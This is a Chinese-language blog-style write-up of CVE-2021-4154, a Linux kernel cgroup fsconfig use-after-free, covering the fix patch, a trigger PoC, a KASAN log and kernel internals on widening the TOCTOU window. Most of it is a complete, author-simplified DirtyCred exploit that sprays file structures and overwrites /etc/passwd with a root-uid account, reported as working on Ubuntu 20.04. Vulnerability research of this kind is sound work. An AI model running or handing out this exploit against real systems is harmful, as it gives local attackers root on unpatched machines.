Dritycred利用示例中的第一个漏洞 - CVE-2021-4154,相关ppt、论文、源码如下:
BlackHat USA 2022 - Cautious! A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe
论文 - DirtyCred: Escalating Privilege in Linux Kernel
github - Markakd/DirtyCred
针对该漏洞,除了Dritycred利用方法,还可以通过cross-cache常规方法来做(过程更复杂)。
漏洞分析
漏洞点信息:cgroup: verify that source is a string
漏洞修复patch如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 @@ -912,6 +912,8 @@ int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param) opt = fs_parse(fc, cgroup1_fs_parameters, param, &result); if (opt == -ENOPARAM) { if (strcmp(param->key, "source") == 0) { + if (param->type != fs_value_is_string) + return invalf(fc, "Non-string source"); if (fc->source) return invalf(fc, "Multiple sources not supported"); fc->source = param->string;
poc代码片段如下
1 2 3 4 int fscontext_fd = fsopen("cgroup" );int fd_null = open("/dev/null, O_RDONLY); int fsconfig(fscontext_fd, FSCONFIG_SET_FD, " source", fd_null); close_range(3, ~0U, 0); // close(fscontext_fd)时fd_null对应的struct file会被释放,产生UAF
漏洞点在fsconfig系统调用处理过程中,它将”文件描述符fd_null对应的file结构”当成了一个”存储字符串的堆块指针”,即混淆了如下结构体中fs_parameter->file
和 fs_parameter->string
,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 struct fs_parameter { const char *key; enum fs_value_type type :8 ; union { char *string ; void *blob; struct filename *name ; struct file *file ; }; size_t size; int dirfd; };
于是将一个file结构指针赋值给了fc->source
。当调用close(fscontext_fd)
时释放fc->source
(即fd_null对应的file结构),但此时fd_null仍然还在使用当中,于是出现了UAF。
跟踪一下UAF的形成过程:
先看一下给fc->source
赋值的操作,跟踪fsconfig的调用路径
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 SYSCALL_DEFINE5(fsconfig, int , fd, unsigned int , cmd, const char __user *, _key, const void __user *, _value, int , aux) vfs_fsconfig_locked(fc, cmd, ¶m); vfs_parse_fs_param(fc, param); fc->ops->parse_param(fc, param); cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
再看一下释放点,用户态执行close(fscontext_fd)
后,内核调用路径如下
1 2 3 4 5 6 7 8 fscontext_release() put_fs_context()
从代码逻辑来说:
cgroup v1的fs parser对于key为”source”的情况,默认aux应当指向一个字符串。然而,实际代码实现中,在指定key为”source”的情况下,指定aux指向一个文件描述符也是可以进入cgroup1_parse_param()
分支的。所以,默认”source”对应的type总是fs_value_is_string导致了漏洞的产生,因为type也可能是fs_value_is_file。
从fs_parameter结构体角度来说:
使用fs_parameter结构体中union结构时,按理说应当根据param->type的值来解析此时对应union的哪一个成员。但是cgroup1_parse_param()
的参数解析流程并未检查param->type,理所当然解析为param->string,并赋值给fc->source(导致file结构体指针给到了fc->source)。
poc
poc中使用到了fsopen()
和fsconfig()
两个函数,先了解一下:
1 2 3 4 5 6 7 8 9 10 11 asmlinkage long sys_fsopen (const char __user *fs_name, unsigned int flags) ;asmlinkage long sys_fsconfig (int fs_fd, unsigned int cmd, const char __user *key, const void __user *value, int aux) ;
poc代码如下,编译执行后,在dmesg中能看到UAF的打印(前提是内核开启了KASAN,不然无法捕捉到)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <stdarg.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <ctype.h> #include <pthread.h> #include <sys/mman.h> #include <sys/syscall.h> static void die (const char *fmt, ...) { va_list params; va_start(params, fmt); vfprintf (stderr , fmt, params); va_end(params); exit (1 ); } void init_namespace (void ) { int fd; char buff[0x100 ]; uid_t uid = getuid(); gid_t gid = getgid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) { die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m" ); } if (unshare(CLONE_NEWNET)) { die("unshare(CLONE_NEWNET): %m" ); } fd = open("/proc/self/setgroups" , O_WRONLY); snprintf (buff, sizeof (buff), "deny" ); write(fd, buff, strlen (buff)); close(fd); fd = open("/proc/self/uid_map" , O_WRONLY); snprintf (buff, sizeof (buff), "0 %d 1" , uid); write(fd, buff, strlen (buff)); close(fd); fd = open("/proc/self/gid_map" , O_WRONLY); snprintf (buff, sizeof (buff), "0 %d 1" , gid); write(fd, buff, strlen (buff)); close(fd); } int main () { init_namespace(); int fd_fscontext = syscall(__NR_fsopen, "cgroup" , 0 ); if (fd_fscontext < 0 ) { perror("fsopen" ); die("" ); } int fd_null = open("/dev/null" , O_RDONLY); syscall(__NR_fsconfig, fd_fscontext, 5 , "source" , 0 , fd_null); close(fd_fscontext); close(fd_null); }
dmesg中打印的信息如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 [ 1785.655850] ================================================================== [ 1785.658925] BUG: KASAN: use-after-free in filp_close+0x26/0xb0 [ 1785.661875] Read of size 8 at addr ffff8883cd692c78 by task test/2163 [ 1785.667787] CPU: 6 PID: 2163 Comm: test Tainted: G L 5.4.0 #2 [ 1785.667790] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 [ 1785.667793] Call Trace: [ 1785.667808] dump_stack+0x96/0xca [ 1785.667818] print_address_description.constprop.0+0x20/0x210 [ 1785.667824] ? filp_close+0x26/0xb0 [ 1785.667828] __kasan_report.cold+0x1b/0x41 [ 1785.667832] ? filp_close+0x26/0xb0 [ 1785.667836] kasan_report+0x12/0x20 [ 1785.667841] check_memory_region+0x129/0x1b0 [ 1785.667845] __kasan_check_read+0x11/0x20 [ 1785.667848] filp_close+0x26/0xb0 [ 1785.667854] __close_fd+0x11d/0x150 [ 1785.667858] __x64_sys_close+0x40/0x80 [ 1785.667865] do_syscall_64+0x72/0x210 [ 1785.667870] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 1785.667876] RIP: 0033:0x7fe01ac4a817 [ 1785.667883] Code: ff ff e8 7c 12 02 00 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 41 c3 48 83 ec 18 89 7c 24 0c e8 b3 5d f8 ff [ 1785.667885] RSP: 002b:00007ffeba9710a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000003 [ 1785.667891] RAX: ffffffffffffffda RBX: 000055e759df2640 RCX: 00007fe01ac4a817 [ 1785.667893] RDX: 000055e759df311a RSI: 0000000000000005 RDI: 0000000000000004 [ 1785.667895] RBP: 00007ffeba9710c0 R08: 0000000000000004 R09: 00007ffeba9711b0 [ 1785.667897] R10: 0000000000000000 R11: 0000000000000246 R12: 000055e759df21e0 [ 1785.667900] R13: 00007ffeba9711b0 R14: 0000000000000000 R15: 0000000000000000 [ 1785.670155] Allocated by task 2163: [ 1785.672385] save_stack+0x23/0x90 [ 1785.672389] __kasan_kmalloc.constprop.0+0xcf/0xe0 [ 1785.672393] kasan_slab_alloc+0xe/0x10 [ 1785.672396] kmem_cache_alloc+0xce/0x240 [ 1785.672400] __alloc_file+0x2b/0x1c0 [ 1785.672402] alloc_empty_file+0x46/0xc0 [ 1785.672407] path_openat+0xd1/0x22f0 [ 1785.672410] do_filp_open+0x12b/0x1c0 [ 1785.672413] do_sys_open+0x1fb/0x2f0 [ 1785.672417] __x64_sys_openat+0x59/0x70 [ 1785.672421] do_syscall_64+0x72/0x210 [ 1785.672425] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 1785.674579] Freed by task 2163: [ 1785.676657] save_stack+0x23/0x90 [ 1785.676661] __kasan_slab_free+0x137/0x180 [ 1785.676664] kasan_slab_free+0xe/0x10 [ 1785.676667] kfree+0x98/0x260 [ 1785.676671] put_fs_context+0x16f/0x210 [ 1785.676674] fscontext_release+0x35/0x40 [ 1785.676678] __fput+0x16e/0x3a0 [ 1785.676680] ____fput+0xe/0x10 [ 1785.676686] task_work_run+0xc0/0xe0 [ 1785.676690] exit_to_usermode_loop+0x187/0x1c0 [ 1785.676693] do_syscall_64+0x1e0/0x210 [ 1785.676697] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 1785.678642] The buggy address belongs to the object at ffff8883cd692c40 which belongs to the cache filp(1119:session-1.scope) of size 256 [ 1785.683211] The buggy address is located 56 bytes inside of 256-byte region [ffff8883cd692c40, ffff8883cd692d40) [ 1785.687552] The buggy address belongs to the page: [ 1785.689679] page:ffffea000f35a400 refcount:1 mapcount:0 mapping:ffff8883cfa661c0 index:0xffff8883cd6952c0 compound_mapcount: 0 [ 1785.689687] raw: 0017ffffc0010200 ffffea000cd81008 ffff8883d45ace50 ffff8883cfa661c0 [ 1785.689692] raw: ffff8883cd6952c0 00000000002e001f 00000001ffffffff 0000000000000000 [ 1785.689694] page dumped because: kasan: bad access detected [ 1785.691712] Memory state around the buggy address: [ 1785.693790] ffff8883cd692b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 1785.695944] ffff8883cd692b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 1785.698214] >ffff8883cd692c00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb [ 1785.699548] ^ [ 1785.701820] ffff8883cd692c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 1785.703994] ffff8883cd692d00: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc [ 1785.706162] ================================================================== [ 1785.708370] Disabling lock debugging due to kernel taint
利用方法 - dirtycred
利用的逻辑用几张图来描述:
首先是UAF如何产生的
然后,在理想条件下的利用思路
根据dirtycred利用思路,在对文件检查和实际写入的窗口间隙,将file结构体替换成不具备写权限的特权文件。
但是”check”和”write”的时间窗口实在太小了,很难构成利用。
最后,延长TOC-TOU时间窗口的利用思路
在原作者的exp基础上做了些更改,写了一版更简洁易读的利用代码。主要有以下几点区别:
使用封装好的创建命名空间的函数
使用更常用的write函数,而不是writev
将写入数据缩小为1G,缩短exp执行时间,这个窗口完全足够利用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <stdarg.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <ctype.h> #include <pthread.h> #include <assert.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/uio.h> #include <sys/stat.h> #include <linux/kcmp.h> #ifndef __NR_fsconfig #define __NR_fsconfig 431 #endif #ifndef __NR_fsopen #define __NR_fsopen 430 #endif #define NR_PAGE 0x40000 #define MAX_FILE_NUM 1000 int uaf_fd;int fds[MAX_FILE_NUM];int run_write = 0 ;int run_spray = 0 ;static void die (const char *fmt, ...) { va_list params; va_start(params, fmt); vfprintf (stderr , fmt, params); va_end(params); exit (1 ); } void init_namespace (void ) { int fd; char buff[0x100 ]; uid_t uid = getuid(); gid_t gid = getgid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) { die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m \n" ); } if (unshare(CLONE_NEWNET)) { die("unshare(CLONE_NEWNET): %m \n" ); } fd = open("/proc/self/setgroups" , O_WRONLY); snprintf (buff, sizeof (buff), "deny" ); write(fd, buff, strlen (buff)); close(fd); fd = open("/proc/self/uid_map" , O_WRONLY); snprintf (buff, sizeof (buff), "0 %d 1" , uid); write(fd, buff, strlen (buff)); close(fd); fd = open("/proc/self/gid_map" , O_WRONLY); snprintf (buff, sizeof (buff), "0 %d 1" , gid); write(fd, buff, strlen (buff)); close(fd); } static void use_temporary_dir (void ) { system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data" ); char *tmpdir = "exp_dir" ; if (!tmpdir) exit (1 ); if (chmod(tmpdir, 0777 )) exit (1 ); if (chdir(tmpdir)) exit (1 ); } void trigger () { int fs_fd = syscall(__NR_fsopen, "cgroup" , 0 ); if (fs_fd < 0 ) { perror("fsopen" ); die("" ); } symlink("./data" , "./uaf" ); uaf_fd = open("./uaf" , 1 ); if (uaf_fd < 0 ) { die("failed to open symbolic file\n" ); } if (syscall(__NR_fsconfig, fs_fd, 5 , "source" , 0 , uaf_fd)) { perror("fsconfig" ); exit (-1 ); } close(fs_fd); } void *slow_write () { printf ("[*] start slow write to get the lock\n" ); int fd = open("./uaf" , 1 ); if (fd < 0 ) { perror("error open uaf file" ); exit (-1 ); } unsigned long int addr = 0x30000000 ; int offset; for (offset = 0 ; offset < NR_PAGE; offset++) { void *r = mmap((void *)(addr + offset * 0x1000 ), 0x1000 , PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0 , 0 ); if (r < 0 ) { printf ("allocate failed at 0x%x\n" , offset); } } assert(offset > 0 ); uint64_t wr_len = (NR_PAGE-1 )*0x1000 ; run_write = 1 ; if (write(fd, (void *)addr, wr_len) < 0 ) { perror("slow write" ); } printf ("[*] write done!\n" ); close(fd); } void *write_cmd () { char data[1024 ] = "bling:x:0:0:root:/home/bling:/bin/bash\nroot:x:0:0:root:/root:/bin/bash\n" ; while (!run_write) {} run_spray = 1 ; if (write(uaf_fd, data, strlen (data)) < 0 ){ printf ("failed to write\n" ); } printf ("[*] overwrite done! It should be after the slow write\n" ); } void spray_files () { int found = 0 ; while (!run_spray) {} printf ("[*] got uaf fd %d, start spray....\n" , uaf_fd); for (int i = 0 ; i < MAX_FILE_NUM; i++) { fds[i] = open("/etc/passwd" , O_RDONLY); if (fds[i] < 0 ) { perror("open file" ); printf ("%d\n" , i); } if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, fds[i]) == 0 ) { found = 1 ; printf ("[!] found, file id %d\n" , i); for (int j = 0 ; j < i; j++) close(fds[j]); break ; } } if (found == 0 ){ printf ("spary failed, try again!\n" ); } } int main () { pthread_t p_id, p_id_cmd; use_temporary_dir(); init_namespace(); trigger(); pthread_create(&p_id, NULL , slow_write, NULL ); usleep(1 ); pthread_create(&p_id_cmd, NULL , write_cmd, NULL ); spray_files(); pthread_exit(NULL ); return 0 ; }
使用ubuntu server 20.04 搭建虚拟机环境,成功改写/etc/passwd
文件提权:
利用方法 - cross-cache
todo…
这个解法不禁让我想起了前阵子D3ctf没做出来的kcache那道题…. cross cache + msgmsg + pipe buffer…. 先放一放,缓缓
我问我答
write(v)时,”check”和”write”在哪儿?
“check”点是指校验文件本身权限的位置,即file->f_mode
是否有写标志。”write”点是指真正执行写操作的位置。
前者write和writev不在一个函数中,后者都在文件系统对应的写函数中。
read/write/readv/writev系统调用对应内核处理函数入口
1 2 3 4 5 writev -> do_writev readv -> do_readv write -> ksys_write read -> ksys_read open -> do_sys_open
以linux 5.4.0为例,跟踪一下writev和write两个系统调用处理过程中的”check”点和”write”点。
“check”位置:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 static ssize_t do_iter_write (struct file *file, struct iov_iter *iter, loff_t *pos, rwf_t flags) { if (!(file->f_mode & FMODE_WRITE)) return -EBADF; if (!(file->f_mode & FMODE_CAN_WRITE)) return -EINVAL; if (file->f_op->write_iter) ret = do_iter_readv_writev(file, iter, pos, WRITE, flags); return ret; } ssize_t vfs_write (struct file *file, const char __user *buf, size_t count, loff_t *pos) { if (!(file->f_mode & FMODE_WRITE)) return -EBADF; if (!(file->f_mode & FMODE_CAN_WRITE)) return -EINVAL; else if (file->f_op->write_iter) ret = new_sync_write(file, buf, count, pos); return ret; }
“write”位置:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 static ssize_t ext4_buffered_write_iter (struct kiocb *iocb, struct iov_iter *from) { inode_lock(inode); ret = generic_perform_write(iocb->ki_filp, from, iocb->ki_pos); out: inode_unlock(inode); return ret; }
所以利用中,一个进程通过大文件写延迟inode_unlock(inode);
的执行时间,另一个进程便会停在inode_lock(inode);
获取锁的位置。于是构造了"check" -> 暂停 -> "write"
的效果,这两个进程的搭配下,大文件的大小可以决定TOC-TOU的时间窗口长度。
为什么选writev而不是write?
write也可以
Jann Horn 的 double-put exploit 的场景下,需要使用writev,因为它利用内核读iovec结构时,让内核线程暂停执行。
而本漏洞利用中,让内核线程暂停的点在ext4_file_write_iter()
函数中,对writev和write来说是一样的,两者都会走到该分支。
因为无所谓用writev还是write,所以我的exp中就选择了更熟悉的write函数。
为什么需要创建一个软链接来写入?
为了绕过__fdget_pos()函数中的锁
无论调用write()
还是writev()
写文件时,都会进入fdget_pos()
函数。这个函数中会根据文件模式(file->f_mode
),决定是否获取锁(file->f_pos_lock
)。当file->f_mode
中包含FMODE_ATOMIC_POS
时,就会获取file->f_pos_lock
这个锁,防止其他线程进入。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 static inline struct fd fdget_pos (int fd) { return __to_fd(__fdget_pos(fd)); } unsigned long __fdget_pos(unsigned int fd){ unsigned long v = __fdget(fd); struct file *file = (struct file *)(v & ~3 ); if (file && (file->f_mode & FMODE_ATOMIC_POS)) { if (file_count(file) > 1 ) { v |= FDPUT_POS_UNLOCK; mutex_lock(&file->f_pos_lock); } } return v; } #define FMODE_ATOMIC_POS ((__force fmode_t)0x8000)
然而此时还未进行写文件权限校验,对于我们的利用来说需要一个权限校验后的锁,fdget_pos()
函数的锁导致我们无法增加TOC-TOU的时间窗口,所以需要想办法绕过这个锁。
FMODE_ATOMIC_POS
是从哪里来的呢?当我们open()
一个文件时,会进入如下函数分支。当文件inode是一个常规文件或者目录时,文件的f_mode
就会被添加FMODE_ATOMIC_POS
标志。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static int do_dentry_open (struct file *f, struct inode *inode, int (*open)(struct inode *, struct file *)) { if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode)) f->f_mode |= FMODE_ATOMIC_POS; } S_ISLNK(st_mode) S_ISREG(st_mode) S_ISDIR(st_mode) S_ISCHR(st_mode) S_ISBLK(st_mode) S_ISFIFO(st_mode) S_ISSOCK(st_mode)
所以,我们只需要为待写入的文件创建一个软链接,然后打开软链接写入,就可以避免f_mode
被添加FMODE_ATOMIC_POS
标志,也就可以绕过fdget_pos()
函数中获取锁的操作。
参考文档
CVE-2021-4154 错误释放任意file对象-DirtyCred利用
Linux文件系统之mount
新一代mount系统调用(1)——接口初探
【C语言】S_ISDIR S_ISREG等常见的几个宏
kcmp(2) — Linux manual page